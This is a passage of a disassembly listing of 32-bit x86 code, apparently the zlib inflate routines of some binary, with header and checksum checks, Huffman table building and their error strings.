dec [ebp+var_10]
mov [ecx], al
loc_49DE0D: ; CODE XREF: sub_49DBEB+209�j
cmp [ebp+var_10], 102h
jb short loc_49DE41
cmp [ebp+var_4], 0Ah
jb short loc_49DE41
jmp loc_49DC42
; ---------------------------------------------------------------------------
loc_49DE21: ; CODE XREF: sub_49DBEB+120�j
mov ecx, [edi+4]
mov eax, edx
sub ecx, [ebp+var_4]
mov dword ptr [edi+18h], offset aInvalidDistanc ; "invalid distance code"
shr eax, 3
cmp eax, ecx
jnb short loc_49DE39
mov ecx, eax
loc_49DE39: ; CODE XREF: sub_49DBEB+24A�j
mov esi, [ebp+arg_10]
push 0FFFFFFFDh
pop eax
jmp short loc_49DE8B
; ---------------------------------------------------------------------------
loc_49DE41: ; CODE XREF: sub_49DBEB+229�j
; sub_49DBEB+22F�j
mov ecx, [edi+4]
mov eax, edx
sub ecx, [ebp+var_4]
shr eax, 3
cmp eax, ecx
jnb short loc_49DE52
mov ecx, eax
loc_49DE52: ; CODE XREF: sub_49DBEB+263�j
xor eax, eax
jmp short loc_49DE8B
; ---------------------------------------------------------------------------
loc_49DE56: ; CODE XREF: sub_49DBEB+A6�j
test cl, 20h
jz short loc_49DE70
mov ecx, [edi+4]
mov eax, edx
sub ecx, [ebp+var_4]
shr eax, 3
cmp eax, ecx
jnb short loc_49DE6C
mov ecx, eax
loc_49DE6C: ; CODE XREF: sub_49DBEB+27D�j
push 1
jmp short loc_49DE8A
; ---------------------------------------------------------------------------
loc_49DE70: ; CODE XREF: sub_49DBEB+26E�j
mov ecx, [edi+4]
mov eax, edx
sub ecx, [ebp+var_4]
mov dword ptr [edi+18h], offset aInvalidLiteral ; "invalid literal/length code"
shr eax, 3
cmp eax, ecx
jnb short loc_49DE88
mov ecx, eax
loc_49DE88: ; CODE XREF: sub_49DBEB+299�j
push 0FFFFFFFDh
loc_49DE8A: ; CODE XREF: sub_49DBEB+283�j
pop eax
loc_49DE8B: ; CODE XREF: sub_49DBEB+254�j
; sub_49DBEB+269�j
mov ebx, [ebp+arg_14]
sub [ebp+var_8], ecx
mov [esi+20h], ebx
mov ebx, ecx
shl ebx, 3
sub edx, ebx
mov [esi+1Ch], edx
mov edx, [ebp+var_4]
add ecx, edx
mov [edi+4], ecx
mov ecx, [ebp+var_8]
mov edx, ecx
sub edx, [edi]
mov [edi], ecx
mov ecx, [ebp+var_C]
add [edi+8], edx
mov [esi+34h], ecx
pop edi
pop esi
pop ebx
leave
retn
sub_49DBEB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_49DEBD proc near ; CODE XREF: sub_49DF41+D4�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
xor edx, edx
cmp eax, edx
jz short loc_49DEFB
mov ecx, [eax+1Ch]
cmp ecx, edx
jz short loc_49DEFB
push esi
mov [eax+14h], edx
mov [eax+8], edx
mov [eax+18h], edx
mov esi, [ecx+0Ch]
push edx
neg esi
sbb esi, esi
push eax
and esi, 7
mov [ecx], esi
mov eax, [eax+1Ch]
push dword ptr [eax+14h]
call sub_49CB53
add esp, 0Ch
xor eax, eax
pop esi
pop ebp
retn
; ---------------------------------------------------------------------------
loc_49DEFB: ; CODE XREF: sub_49DEBD+A�j
; sub_49DEBD+11�j
push 0FFFFFFFEh
pop eax
pop ebp
retn
sub_49DEBD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_49DF00 proc near ; CODE XREF: sub_49DF41+C9�p
; sub_49E9F3+59�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push esi
mov esi, [ebp+arg_0]
test esi, esi
jz short loc_49DF3B
mov eax, [esi+1Ch]
test eax, eax
jz short loc_49DF3B
cmp dword ptr [esi+24h], 0
jz short loc_49DF3B
mov eax, [eax+14h]
test eax, eax
jz short loc_49DF28
push esi
push eax
call sub_49D5B0
pop ecx
pop ecx
loc_49DF28: ; CODE XREF: sub_49DF00+1D�j
push dword ptr [esi+1Ch]
push dword ptr [esi+28h]
call dword ptr [esi+24h]
and dword ptr [esi+1Ch], 0
pop ecx
pop ecx
xor eax, eax
jmp short loc_49DF3E
; ---------------------------------------------------------------------------
loc_49DF3B: ; CODE XREF: sub_49DF00+9�j
; sub_49DF00+10�j ...
push 0FFFFFFFEh
pop eax
loc_49DF3E: ; CODE XREF: sub_49DF00+39�j
pop esi
pop ebp
retn
sub_49DF00 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_49DF41 proc near ; CODE XREF: sub_49E02B+E�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
mov eax, [ebp+arg_8]
push ebx
push esi
push edi
xor edi, edi
cmp eax, edi
jz loc_49E023
mov al, [eax]
cmp al, ds:byte_4A00A8
jnz loc_49E023
cmp [ebp+arg_C], 38h
jnz loc_49E023
mov esi, [ebp+arg_0]
cmp esi, edi
jnz short loc_49DF7A
push 0FFFFFFFEh
jmp loc_49E025
; ---------------------------------------------------------------------------
loc_49DF7A: ; CODE XREF: sub_49DF41+30�j
cmp [esi+20h], edi
mov [esi+18h], edi
jnz short loc_49DF8C
mov dword ptr [esi+20h], offset sub_49EA72
mov [esi+28h], edi
loc_49DF8C: ; CODE XREF: sub_49DF41+3F�j
cmp [esi+24h], edi
jnz short loc_49DF98
mov dword ptr [esi+24h], offset sub_49EA8C
loc_49DF98: ; CODE XREF: sub_49DF41+4E�j
push 18h
push 1
pop ebx
push ebx
push dword ptr [esi+28h]
call dword ptr [esi+20h]
add esp, 0Ch
cmp eax, edi
mov [esi+1Ch], eax
jnz short loc_49DFB2
push 0FFFFFFFCh
jmp short loc_49E025
; ---------------------------------------------------------------------------
loc_49DFB2: ; CODE XREF: sub_49DF41+6B�j
mov ecx, [ebp+arg_4]
mov [eax+14h], edi
mov eax, [esi+1Ch]
cmp ecx, edi
mov [eax+0Ch], edi
jge short loc_49DFCA
mov eax, [esi+1Ch]
neg ecx
mov [eax+0Ch], ebx
loc_49DFCA: ; CODE XREF: sub_49DF41+7F�j
cmp ecx, 8
jl short loc_49E01F
cmp ecx, 0Fh
jg short loc_49E01F
mov eax, [esi+1Ch]
shl ebx, cl
mov [eax+10h], ecx
mov eax, [esi+1Ch]
mov eax, [eax+0Ch]
neg eax
sbb eax, eax
push ebx
not eax
and eax, offset sub_48DF6E
push eax
push esi
call sub_49CBBF
mov ecx, [esi+1Ch]
add esp, 0Ch
mov [ecx+14h], eax
mov eax, [esi+1Ch]
cmp [eax+14h], edi
jnz short loc_49E014
push 0FFFFFFFCh
loc_49E008: ; CODE XREF: sub_49DF41+E0�j
pop edi
push esi
call sub_49DF00
pop ecx
mov eax, edi
jmp short loc_49E026
; ---------------------------------------------------------------------------
loc_49E014: ; CODE XREF: sub_49DF41+C3�j
push esi
call sub_49DEBD
pop ecx
xor eax, eax
jmp short loc_49E026
; ---------------------------------------------------------------------------
loc_49E01F: ; CODE XREF: sub_49DF41+8C�j
; sub_49DF41+91�j
push 0FFFFFFFEh
jmp short loc_49E008
; ---------------------------------------------------------------------------
loc_49E023: ; CODE XREF: sub_49DF41+D�j
; sub_49DF41+1B�j ...
push 0FFFFFFFAh
loc_49E025: ; CODE XREF: sub_49DF41+34�j
; sub_49DF41+6F�j
pop eax
loc_49E026: ; CODE XREF: sub_49DF41+D1�j
; sub_49DF41+DC�j
pop edi
pop esi
pop ebx
pop ebp
retn
sub_49DF41 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_49E02B proc near ; CODE XREF: sub_49E9F3+35�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push [ebp+arg_8]
push [ebp+arg_4]
push 0Fh
push [ebp+arg_0]
call sub_49DF41
add esp, 10h
pop ebp
retn
sub_49E02B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_49E043 proc near ; CODE XREF: sub_49E9F3+47�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ebx
push esi
mov esi, [ebp+arg_0]
xor eax, eax
cmp esi, eax
push edi
jz loc_49E355 ; default
cmp [esi+1Ch], eax
jz loc_49E355 ; default
cmp [esi], eax
jz loc_49E355 ; default
cmp [ebp+arg_4], 4
push 0FFFFFFFBh
pop ebx
mov [ebp+arg_4], ebx
jz short loc_49E076
mov [ebp+arg_4], eax
loc_49E076: ; CODE XREF: sub_49E043+2E�j
; sub_49E043+111�j
push 0Dh
pop edi
loc_49E079: ; CODE XREF: sub_49E043+8A�j
; sub_49E043+FA�j ...
mov eax, [esi+1Ch]
mov ecx, [eax]
cmp ecx, edi ; switch 14 cases
ja loc_49E355 ; default
jmp ds:off_49E36E[ecx*4] ; switch jump
loc_49E08D: ; DATA XREF: _4:off_49E36E�o
mov ecx, [esi+4] ; jumptable 0049E086 case 0
test ecx, ecx
jz loc_49E27F
dec ecx
inc dword ptr [esi+8]
mov [esi+4], ecx
mov ecx, [esi]
mov ebx, [ebp+arg_4]
movzx ecx, byte ptr [ecx]
mov [eax+4], ecx
mov eax, [esi+1Ch]
mov ecx, [eax+4]
and ecx, 0Fh
inc dword ptr [esi]
cmp cl, 8
jz short loc_49E0CF
mov [eax], edi
mov dword ptr [esi+18h], offset aUnknownCompres ; "unknown compression method"
loc_49E0C3: ; CODE XREF: sub_49E043+A3�j
; sub_49E043+237�j
mov eax, [esi+1Ch]
mov dword ptr [eax+4], 5
jmp short loc_49E079
; ---------------------------------------------------------------------------
loc_49E0CF: ; CODE XREF: sub_49E043+75�j
mov ecx, [eax+4]
shr ecx, 4
add ecx, 8
cmp ecx, [eax+10h]
jbe short loc_49E0E8
mov [eax], edi
mov dword ptr [esi+18h], offset aInvalidWindowS ; "invalid window size"
jmp short loc_49E0C3
; ---------------------------------------------------------------------------
loc_49E0E8: ; CODE XREF: sub_49E043+98�j
mov dword ptr [eax], 1
loc_49E0EE: ; CODE XREF: sub_49E043+43�j
; DATA XREF: _4:off_49E36E�o
mov eax, [esi+4] ; jumptable 0049E086 case 1
test eax, eax
jz loc_49E27F
mov ecx, [ebp+arg_4]
dec eax
inc dword ptr [esi+8]
mov [esi+4], eax
mov eax, [esi]
mov [ebp+arg_0], ecx
mov ecx, [esi+1Ch]
push 1Fh
movzx ebx, byte ptr [eax]
inc eax
xor edx, edx
mov [esi], eax
mov eax, [ecx+4]
shl eax, 8
add eax, ebx
pop edi
div edi
test edx, edx
jz short loc_49E142
push 0Dh
mov ebx, [ebp+arg_0]
pop edi
mov [ecx], edi
mov eax, [esi+1Ch]
mov dword ptr [esi+18h], offset aIncorrectHeade ; "incorrect header check"
mov dword ptr [eax+4], 5
jmp loc_49E079
; ---------------------------------------------------------------------------
loc_49E142: ; CODE XREF: sub_49E043+DF�j
test bl, 20h
jnz loc_49E286
mov ebx, [ebp+arg_0]
mov dword ptr [ecx], 7
jmp loc_49E076
; ---------------------------------------------------------------------------
loc_49E159: ; CODE XREF: sub_49E043+43�j
; DATA XREF: _4:off_49E36E�o
push ebx ; jumptable 0049E086 case 7
push esi
push dword ptr [eax+14h]
call sub_49CC4B
mov ebx, eax
add esp, 0Ch
cmp ebx, 0FFFFFFFDh
jnz short loc_49E17E
mov eax, [esi+1Ch]
mov [eax], edi
mov eax, [esi+1Ch]
and dword ptr [eax+4], 0
jmp loc_49E079
; ---------------------------------------------------------------------------
loc_49E17E: ; CODE XREF: sub_49E043+128�j
test ebx, ebx
jnz short loc_49E185
mov ebx, [ebp+arg_4]
loc_49E185: ; CODE XREF: sub_49E043+13D�j
cmp ebx, 1
jnz loc_49E27F
mov eax, [esi+1Ch]
mov ebx, [ebp+arg_4]
lea ecx, [eax+4]
push ecx
push esi
push dword ptr [eax+14h]
call sub_49CB53
mov eax, [esi+1Ch]
add esp, 0Ch
cmp dword ptr [eax+0Ch], 0
jz short loc_49E1B8
mov dword ptr [eax], 0Ch
jmp loc_49E079
; ---------------------------------------------------------------------------
loc_49E1B8: ; CODE XREF: sub_49E043+168�j
mov dword ptr [eax], 8
loc_49E1BE: ; CODE XREF: sub_49E043+43�j
; DATA XREF: _4:off_49E36E�o
mov eax, [esi+4] ; jumptable 0049E086 case 8
test eax, eax
jz loc_49E27F
dec eax
inc dword ptr [esi+8]
mov ecx, [esi+1Ch]
mov [esi+4], eax
mov eax, [esi]
mov ebx, [ebp+arg_4]
movzx eax, byte ptr [eax]
shl eax, 18h
mov [ecx+8], eax
mov eax, [esi+1Ch]
inc dword ptr [esi]
mov dword ptr [eax], 9
loc_49E1EC: ; CODE XREF: sub_49E043+43�j
; DATA XREF: _4:off_49E36E�o
mov eax, [esi+4] ; jumptable 0049E086 case 9
test eax, eax
jz loc_49E27F
mov ecx, [esi]
dec eax
inc dword ptr [esi+8]
mov [esi+4], eax
movzx ecx, byte ptr [ecx]
mov eax, [esi+1Ch]
mov ebx, [ebp+arg_4]
shl ecx, 10h
add [eax+8], ecx
mov eax, [esi+1Ch]
inc dword ptr [esi]
mov dword ptr [eax], 0Ah
loc_49E21A: ; CODE XREF: sub_49E043+43�j
; DATA XREF: _4:off_49E36E�o
mov eax, [esi+4] ; jumptable 0049E086 case 10
test eax, eax
jz short loc_49E27F
mov ecx, [esi]
dec eax
inc dword ptr [esi+8]
mov [esi+4], eax
movzx ecx, byte ptr [ecx]
mov eax, [esi+1Ch]
mov ebx, [ebp+arg_4]
shl ecx, 8
add [eax+8], ecx
mov eax, [esi+1Ch]
inc dword ptr [esi]
mov dword ptr [eax], 0Bh
loc_49E244: ; CODE XREF: sub_49E043+43�j
; DATA XREF: _4:off_49E36E�o
mov eax, [esi+4] ; jumptable 0049E086 case 11
test eax, eax
jz short loc_49E27F
mov ecx, [esi]
dec eax
inc dword ptr [esi+8]
mov [esi+4], eax
movzx ecx, byte ptr [ecx]
mov eax, [esi+1Ch]
mov ebx, [ebp+arg_4]
add [eax+8], ecx
mov eax, [esi+1Ch]
inc dword ptr [esi]
mov ecx, [eax+4]
cmp ecx, [eax+8]
jz loc_49E35D
mov [eax], edi
mov dword ptr [esi+18h], offset aIncorrectDataC ; "incorrect data check"
jmp loc_49E0C3
; ---------------------------------------------------------------------------
loc_49E27F: ; CODE XREF: sub_49E043+4F�j
; sub_49E043+B0�j ...
mov eax, ebx
jmp loc_49E358
; ---------------------------------------------------------------------------
loc_49E286: ; CODE XREF: sub_49E043+102�j
mov eax, [esi+1Ch]
mov ebx, [ebp+arg_0]
mov dword ptr [eax], 2
loc_49E292: ; CODE XREF: sub_49E043+43�j
; DATA XREF: _4:off_49E36E�o
mov eax, [esi+4] ; jumptable 0049E086 case 2
test eax, eax
jz short loc_49E27F
dec eax
inc dword ptr [esi+8]
mov ecx, [esi+1Ch]
mov [esi+4], eax
mov eax, [esi]
mov ebx, [ebp+arg_4]
movzx eax, byte ptr [eax]
shl eax, 18h
mov [ecx+8], eax
mov eax, [esi+1Ch]
inc dword ptr [esi]
mov dword ptr [eax], 3
loc_49E2BC: ; CODE XREF: sub_49E043+43�j
; DATA XREF: _4:off_49E36E�o
mov eax, [esi+4] ; jumptable 0049E086 case 3
test eax, eax
jz short loc_49E27F
mov ecx, [esi]
dec eax
inc dword ptr [esi+8]
mov [esi+4], eax
movzx ecx, byte ptr [ecx]
mov eax, [esi+1Ch]
mov ebx, [ebp+arg_4]
shl ecx, 10h
add [eax+8], ecx
mov eax, [esi+1Ch]
inc dword ptr [esi]
mov dword ptr [eax], 4
loc_49E2E6: ; CODE XREF: sub_49E043+43�j
; DATA XREF: _4:off_49E36E�o
mov eax, [esi+4] ; jumptable 0049E086 case 4
test eax, eax
jz short loc_49E27F
mov ecx, [esi]
dec eax
inc dword ptr [esi+8]
mov [esi+4], eax
movzx ecx, byte ptr [ecx]
mov eax, [esi+1Ch]
mov ebx, [ebp+arg_4]
shl ecx, 8
add [eax+8], ecx
mov eax, [esi+1Ch]
inc dword ptr [esi]
mov dword ptr [eax], 5
loc_49E310: ; CODE XREF: sub_49E043+43�j
; DATA XREF: _4:off_49E36E�o
mov eax, [esi+4] ; jumptable 0049E086 case 5
test eax, eax
jz loc_49E27F
mov ecx, [esi]
dec eax
inc dword ptr [esi+8]
mov [esi+4], eax
movzx ecx, byte ptr [ecx]
mov eax, [esi+1Ch]
push 2
add [eax+8], ecx
mov eax, [esi+1Ch]
inc dword ptr [esi]
mov ecx, [eax+8]
mov [esi+30h], ecx
mov dword ptr [eax], 6
jmp short loc_49E357
; ---------------------------------------------------------------------------
loc_49E342: ; CODE XREF: sub_49E043+43�j
; DATA XREF: _4:off_49E36E�o
mov eax, [esi+1Ch] ; jumptable 0049E086 case 6
mov [eax], edi
mov eax, [esi+1Ch]
mov dword ptr [esi+18h], offset aNeedDictionary ; "need dictionary"
and dword ptr [eax+4], 0
loc_49E355: ; CODE XREF: sub_49E043+D�j
; sub_49E043+16�j ...
push 0FFFFFFFEh ; default
loc_49E357: ; CODE XREF: sub_49E043+2FD�j
; sub_49E043+325�j ...
pop eax
loc_49E358: ; CODE XREF: sub_49E043+23E�j
pop edi
pop esi
pop ebx
pop ebp
retn
; ---------------------------------------------------------------------------
loc_49E35D: ; CODE XREF: sub_49E043+228�j
mov eax, [esi+1Ch]
mov dword ptr [eax], 0Ch
loc_49E366: ; CODE XREF: sub_49E043+43�j
; DATA XREF: _4:off_49E36E�o
push 1 ; jumptable 0049E086 case 12
jmp short loc_49E357
; ---------------------------------------------------------------------------
loc_49E36A: ; CODE XREF: sub_49E043+43�j
; DATA XREF: _4:off_49E36E�o
push 0FFFFFFFDh ; jumptable 0049E086 case 13
jmp short loc_49E357
sub_49E043 endp
; ---------------------------------------------------------------------------
off_49E36E dd offset loc_49E08D ; DATA XREF: sub_49E043+43�r
dd offset loc_49E0EE ; jump table for switch statement
dd offset loc_49E292
dd offset loc_49E2BC
dd offset loc_49E2E6
dd offset loc_49E310
dd offset loc_49E342
dd offset loc_49E159
dd offset loc_49E1BE
dd offset loc_49E1EC
dd offset loc_49E21A
dd offset loc_49E244
dd offset loc_49E366
dd offset loc_49E36A
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_49E3A6 proc near ; CODE XREF: sub_49CC4B+3C5�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
push esi
mov esi, [ebp+arg_10]
push 4
push 13h
push dword ptr [esi+28h]
call dword ptr [esi+20h]
add esp, 0Ch
mov [ebp+arg_10], eax
test eax, eax
jnz short loc_49E3CB
push 0FFFFFFFCh
pop eax
jmp short loc_49E422
; ---------------------------------------------------------------------------
loc_49E3CB: ; CODE XREF: sub_49E3A6+1E�j
push ebx
push eax
lea eax, [ebp+var_4]
push eax
push [ebp+arg_C]
push [ebp+arg_4]
push [ebp+arg_8]
push 0
push 0
push 13h
push 13h
push [ebp+arg_0]
call sub_49E425
mov ebx, eax
add esp, 28h
cmp ebx, 0FFFFFFFDh
jnz short loc_49E3FD
mov dword ptr [esi+18h], offset aOversubscribed ; "oversubscribed dynamic bit lengths tree"...
jmp short loc_49E414
; ---------------------------------------------------------------------------
loc_49E3FD: ; CODE XREF: sub_49E3A6+4C�j
cmp ebx, 0FFFFFFFBh
jz short loc_49E40A
mov eax, [ebp+arg_4]
cmp dword ptr [eax], 0
jnz short loc_49E414
loc_49E40A: ; CODE XREF: sub_49E3A6+5A�j
push 0FFFFFFFDh
mov dword ptr [esi+18h], offset aIncompleteDyna ; "incomplete dynamic bit lengths tree"
pop ebx
loc_49E414: ; CODE XREF: sub_49E3A6+55�j
; sub_49E3A6+62�j
push [ebp+arg_10]
push dword ptr [esi+28h]
call dword ptr [esi+24h]
pop ecx
mov eax, ebx
pop ecx
pop ebx
loc_49E422: ; CODE XREF: sub_49E3A6+23�j
pop esi
leave
retn
sub_49E3A6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_49E425 proc near ; CODE XREF: sub_49E3A6+3F�p
; sub_49E7AC+52�p ...
var_F0 = dword ptr -0F0h
var_B4 = dword ptr -0B4h
var_B0 = dword ptr -0B0h
var_74 = dword ptr -74h
var_70 = dword ptr -70h
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
arg_24 = dword ptr 2Ch
push ebp
mov ebp, esp
sub esp, 0F0h
mov ecx, [ebp+arg_0]
push ebx
push esi
push edi
mov edi, [ebp+arg_4]
xor edx, edx
mov [ebp+var_74], edx
mov [ebp+var_70], edx
mov [ebp+var_6C], edx
mov [ebp+var_68], edx
mov [ebp+var_64], edx
mov [ebp+var_60], edx
mov [ebp+var_5C], edx
mov [ebp+var_58], edx
mov [ebp+var_54], edx
mov [ebp+var_50], edx
mov [ebp+var_4C], edx
mov [ebp+var_48], edx
mov [ebp+var_44], edx
mov [ebp+var_40], edx
mov [ebp+var_3C], edx
mov [ebp+var_38], edx
mov esi, edi
loc_49E46B: ; CODE XREF: sub_49E425+54�j
mov eax, [ecx]
add ecx, 4
inc [ebp+eax*4+var_74]
lea eax, [ebp+eax*4+var_74]
dec esi
jnz short loc_49E46B
cmp [ebp+var_74], edi
jnz short loc_49E491
mov eax, [ebp+arg_14]
mov [eax], edx
mov eax, [ebp+arg_18]
mov [eax], edx
loc_49E48A: ; CODE XREF: sub_49E425+36F�j
; sub_49E425+379�j
xor eax, eax
loc_49E48C: ; CODE XREF: sub_49E425+382�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_49E491: ; CODE XREF: sub_49E425+59�j
mov edi, [ebp+arg_18]
push 1
pop ebx
lea eax, [ebp+var_70]
mov esi, [edi]
mov ecx, ebx
mov [ebp+arg_18], esi
loc_49E4A1: ; CODE XREF: sub_49E425+87�j
cmp [eax], edx
jnz short loc_49E4AE
inc ecx
add eax, 4
cmp ecx, 0Fh
jbe short loc_49E4A1
loc_49E4AE: ; CODE XREF: sub_49E425+7E�j
cmp esi, ecx
mov [ebp+var_4], ecx
jnb short loc_49E4B8
mov [ebp+arg_18], ecx
loc_49E4B8: ; CODE XREF: sub_49E425+8E�j
push 0Fh
lea esi, [ebp+var_38]
pop eax
loc_49E4BE: ; CODE XREF: sub_49E425+A3�j
cmp [esi], edx
jnz short loc_49E4CA
dec eax
sub esi, 4
cmp eax, edx
jnz short loc_49E4BE
loc_49E4CA: ; CODE XREF: sub_49E425+9B�j
cmp [ebp+arg_18], eax
mov [ebp+var_18], eax
jbe short loc_49E4D5
mov [ebp+arg_18], eax
loc_49E4D5: ; CODE XREF: sub_49E425+AB�j
mov esi, [ebp+arg_18]
shl ebx, cl
cmp ecx, eax
mov [edi], esi
jnb short loc_49E4F6
lea esi, [ebp+ecx*4+var_74]
loc_49E4E4: ; CODE XREF: sub_49E425+CF�j
sub ebx, [esi]
js loc_49E61C
inc ecx
add esi, 4
shl ebx, 1
cmp ecx, eax
jb short loc_49E4E4
loc_49E4F6: ; CODE XREF: sub_49E425+B9�j
mov esi, eax
shl esi, 2
mov edi, [ebp+esi+var_74]
lea ecx, [ebp+esi+var_74]
sub ebx, edi
mov [ebp+var_30], ebx
js loc_49E61C
add edi, ebx
mov [ebp+var_B0], edx
mov [ecx], edi
xor ecx, ecx
dec eax
jz short loc_49E530
xor edi, edi
loc_49E51F: ; CODE XREF: sub_49E425+109�j
add ecx, [ebp+edi+var_70]
add edi, 4
dec eax
mov [ebp+edi+var_B0], ecx
jnz short loc_49E51F
loc_49E530: ; CODE XREF: sub_49E425+F6�j
mov ebx, [ebp+arg_0]
xor edi, edi
loc_49E535: ; CODE XREF: sub_49E425+136�j
mov eax, [ebx]
add ebx, 4
cmp eax, edx
jz short loc_49E557
mov ecx, [ebp+eax*4+var_B4]
mov edx, [ebp+arg_24]
lea eax, [ebp+eax*4+var_B4]
mov [edx+ecx*4], edi
inc ecx
mov [eax], ecx
xor edx, edx
loc_49E557: ; CODE XREF: sub_49E425+117�j
inc edi
cmp edi, [ebp+arg_4]
jb short loc_49E535
mov eax, [ebp+esi+var_B4]
mov ebx, [ebp+arg_18]
or [ebp+var_8], 0FFFFFFFFh
mov [ebp+arg_4], eax
mov eax, [ebp+arg_24]
mov [ebp+var_C], edx
mov [ebp+var_10], eax
mov eax, [ebp+var_4]
neg ebx
cmp eax, [ebp+var_18]
mov [ebp+var_B4], edx
mov [ebp+var_F0], edx
mov [ebp+var_1C], edx
mov [ebp+arg_0], edx
jg loc_49E791
mov edi, [ebp+var_24]
lea ecx, [eax-1]
lea eax, [ebp+eax*4+var_74]
mov [ebp+var_2C], ecx
mov [ebp+var_20], eax
loc_49E5A7: ; CODE XREF: sub_49E425+366�j
mov eax, [ebp+var_20]
mov eax, [eax]
mov ecx, eax
dec eax
test ecx, ecx
mov [ebp+var_14], eax
jz loc_49E77B
loc_49E5BA: ; CODE XREF: sub_49E425+350�j
mov eax, [ebp+arg_18]
add eax, ebx
cmp [ebp+var_4], eax
jle loc_49E6A6
loc_49E5C8: ; CODE XREF: sub_49E425+279�j
mov ecx, [ebp+arg_18]
inc [ebp+var_8]
add eax, ecx
add ebx, ecx
mov [ebp+var_34], eax
mov eax, [ebp+var_18]
sub eax, ebx
cmp eax, ecx
mov [ebp+arg_0], eax
jbe short loc_49E5E4
mov [ebp+arg_0], ecx
loc_49E5E4: ; CODE XREF: sub_49E425+1BA�j
mov ecx, [ebp+var_4]
mov edx, [ebp+var_14]
push 1
sub ecx, ebx
pop eax
shl eax, cl
inc edx
cmp eax, edx
jbe short loc_49E623
mov esi, [ebp+var_20]
or edx, 0FFFFFFFFh
sub edx, [ebp+var_14]
add eax, edx
cmp ecx, [ebp+arg_0]
jnb short loc_49E623
loc_49E606: ; CODE XREF: sub_49E425+1F5�j
inc ecx
cmp ecx, [ebp+arg_0]
jnb short loc_49E623
mov edx, [esi+4]
add esi, 4
shl eax, 1
cmp eax, edx
jbe short loc_49E623
sub eax, edx
jmp short loc_49E606
; ---------------------------------------------------------------------------
loc_49E61C: ; CODE XREF: sub_49E425+C1�j
; sub_49E425+E3�j ...
push 0FFFFFFFDh
jmp loc_49E7A6
; ---------------------------------------------------------------------------
loc_49E623: ; CODE XREF: sub_49E425+1CF�j
; sub_49E425+1DF�j ...
mov eax, [ebp+arg_20]
push 1
pop edx
mov eax, [eax]
shl edx, cl
mov [ebp+arg_0], edx
lea esi, [eax+edx]
cmp esi, 5A0h
ja short loc_49E61C
mov edx, [ebp+arg_1C]
lea eax, [edx+eax*8]
mov edx, [ebp+var_8]
mov [ebp+var_1C], eax
lea edx, [ebp+edx*4+var_F0]
mov [edx], eax
mov eax, [ebp+arg_20]
mov [eax], esi
mov eax, [ebp+var_8]
test eax, eax
jz short loc_49E690
mov esi, [ebp+var_C]
mov edi, [ebp+var_1C]
mov [ebp+eax*4+var_B4], esi
mov eax, [ebp+arg_18]
mov byte ptr [ebp+var_28], cl
mov ecx, ebx
mov byte ptr [ebp+var_28+1], al
sub ecx, eax
mov eax, esi
shr eax, cl
mov ecx, [edx-4]
mov edx, [ebp+var_28]
sub edi, ecx
sar edi, 3
sub edi, eax
mov [ecx+eax*8], edx
mov [ecx+eax*8+4], edi
jmp short loc_49E698
; ---------------------------------------------------------------------------
loc_49E690: ; CODE XREF: sub_49E425+235�j
mov eax, [ebp+arg_14]
mov ecx, [ebp+var_1C]
mov [eax], ecx
loc_49E698: ; CODE XREF: sub_49E425+269�j
mov eax, [ebp+var_34]
cmp [ebp+var_4], eax
jg loc_49E5C8
xor edx, edx
loc_49E6A6: ; CODE XREF: sub_49E425+19D�j
mov al, byte ptr [ebp+var_4]
mov ecx, [ebp+arg_4]
sub al, bl
mov byte ptr [ebp+var_28+1], al
mov eax, [ebp+arg_24]
lea ecx, [eax+ecx*4]
mov eax, [ebp+var_10]
cmp eax, ecx
jb short loc_49E6C4
mov byte ptr [ebp+var_28], 0C0h
jmp short loc_49E6FB
; ---------------------------------------------------------------------------
loc_49E6C4: ; CODE XREF: sub_49E425+297�j
mov eax, [eax]
cmp eax, [ebp+arg_8]
jnb short loc_49E6DF
cmp eax, 100h
mov edi, eax
sbb cl, cl
and cl, 0A0h
add cl, 60h
mov byte ptr [ebp+var_28], cl
jmp short loc_49E6F7
; ---------------------------------------------------------------------------
loc_49E6DF: ; CODE XREF: sub_49E425+2A4�j
sub eax, [ebp+arg_8]
mov ecx, [ebp+arg_10]
shl eax, 2
mov cl, [eax+ecx]
add cl, 50h
mov byte ptr [ebp+var_28], cl
mov ecx, [ebp+arg_C]
mov edi, [eax+ecx]
loc_49E6F7: ; CODE XREF: sub_49E425+2B8�j
